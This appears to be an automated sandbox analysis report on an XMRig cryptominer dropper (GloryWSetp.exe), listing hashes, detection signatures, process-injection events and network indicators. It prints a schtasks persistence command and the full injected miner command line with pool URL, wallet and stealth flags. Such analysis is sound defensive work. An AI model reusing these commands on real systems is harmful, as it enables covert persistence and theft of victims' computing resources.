Overview
overview
10Static
static
7Crack.exe
windows7-x64
3Crack.exe
windows10-2004-x64
7GloryWSetp.exe
windows7-x64
7GloryWSetp.exe
windows10-2004-x64
10Install.exe
windows7-x64
7Install.exe
windows10-2004-x64
7KiffApp2.exe
windows7-x64
1KiffApp2.exe
windows10-2004-x64
1Setup.exe
windows7-x64
7Setup.exe
windows10-2004-x64
7md1_1eaf.exe
windows7-x64
10md1_1eaf.exe
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-11-2024 22:13
Behavioral task
behavioral1
Sample
Crack.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
Crack.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
GloryWSetp.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
GloryWSetp.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Install.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
Install.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
KiffApp2.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
KiffApp2.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
Setup.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
Setup.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
md1_1eaf.exe
Resource
win7-20240708-en
General
-
Target
GloryWSetp.exe
-
Size
185KB
-
MD5
3eabedf278cd8dd76b23497dad959435
-
SHA1
4ca403030401fee6be2d9dbfb4d638e29f9ef19f
-
SHA256
a526e9dae9298bbd03ca2a8fc8a45809eac1543bbec4680182493c551d65f731
-
SHA512
6cdffac5c48e0984eed3a2b28a2a49cf13f79da76763848bdd4c406fc14254f4d10d4fd77a6f444321c2e626d8f2f569c01c01ca70939c880b5847573dcd30d2
-
SSDEEP
3072:URyxMedEB5tC80rnGbjuzl4kDBWE8Gy3LX2SqfbKLwaGzWWSHTie+CS01I641vyl:4ia/Rbi6NS+Lp
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 11 IoCs
resource yara_rule behavioral4/memory/936-48-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/936-50-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/936-52-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/936-55-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/936-53-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/936-54-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/936-56-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/936-57-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/936-60-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/936-59-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/936-61-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation services64.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation GloryWSetp.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation chrome3.exe -
Executes dropped EXE 3 IoCs
pid Process 3876 chrome3.exe 3660 services64.exe 3104 sihost64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 47 raw.githubusercontent.com 48 raw.githubusercontent.com 55 pastebin.com 57 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3660 set thread context of 936 3660 services64.exe 111 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1220 220 WerFault.exe 83 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GloryWSetp.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 468 schtasks.exe 4308 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 56 IoCs
pid Process 3876 chrome3.exe 3660 services64.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe 936 explorer.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3876 chrome3.exe Token: SeDebugPrivilege 3660 services64.exe Token: SeLockMemoryPrivilege 936 explorer.exe Token: SeLockMemoryPrivilege 936 explorer.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 220 wrote to memory of 3876 220 GloryWSetp.exe 86 PID 220 wrote to memory of 3876 220 GloryWSetp.exe 86 PID 3876 wrote to memory of 3128 3876 chrome3.exe 100 PID 3876 wrote to memory of 3128 3876 chrome3.exe 100 PID 3128 wrote to memory of 468 3128 cmd.exe 102 PID 3128 wrote to memory of 468 3128 cmd.exe 102 PID 3876 wrote to memory of 3660 3876 chrome3.exe 104 PID 3876 wrote to memory of 3660 3876 chrome3.exe 104 PID 3660 wrote to memory of 3756 3660 services64.exe 106 PID 3660 wrote to memory of 3756 3660 services64.exe 106 PID 3660 wrote to memory of 3104 3660 services64.exe 108 PID 3660 wrote to memory of 3104 3660 services64.exe 108 PID 3756 wrote to memory of 4308 3756 cmd.exe 109 PID 3756 wrote to memory of 4308 3756 cmd.exe 109 PID 3660 wrote to memory of 936 3660 services64.exe 111 PID 3660 wrote to memory of 936 3660 services64.exe 111 PID 3660 wrote to memory of 936 3660 services64.exe 111 PID 3660 wrote to memory of 936 3660 services64.exe 111 PID 3660 wrote to memory of 936 3660 services64.exe 111 PID 3660 wrote to memory of 936 3660 services64.exe 111 PID 3660 wrote to memory of 936 3660 services64.exe 111 PID 3660 wrote to memory of 936 3660 services64.exe 111 PID 3660 wrote to memory of 936 3660 services64.exe 111 PID 3660 wrote to memory of 936 3660 services64.exe 111 PID 3660 wrote to memory of 936 3660 services64.exe 111 PID 3660 wrote to memory of 936 3660 services64.exe 111 PID 3660 wrote to memory of 936 3660 services64.exe 111 PID 3660 wrote to memory of 936 3660 services64.exe 111 PID 3660 wrote to memory of 936 3660 services64.exe 111 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\GloryWSetp.exe"C:\Users\Admin\AppData\Local\Temp\GloryWSetp.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:468
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:4308
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵
- Executes dropped EXE
PID:3104
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 10642⤵
- Program crash
PID:1220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 220 -ip 2201⤵PID:3104
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
43KB
MD54b0d49f7c8712d7a0d44306309f2e962
SHA15f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA51250dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b
-
Filesize
7KB
MD59910203407b2605107587e954081c575
SHA18037bfb3b779fbbb3273df4f5c63d15b9589ce95
SHA25607b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49
SHA512ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be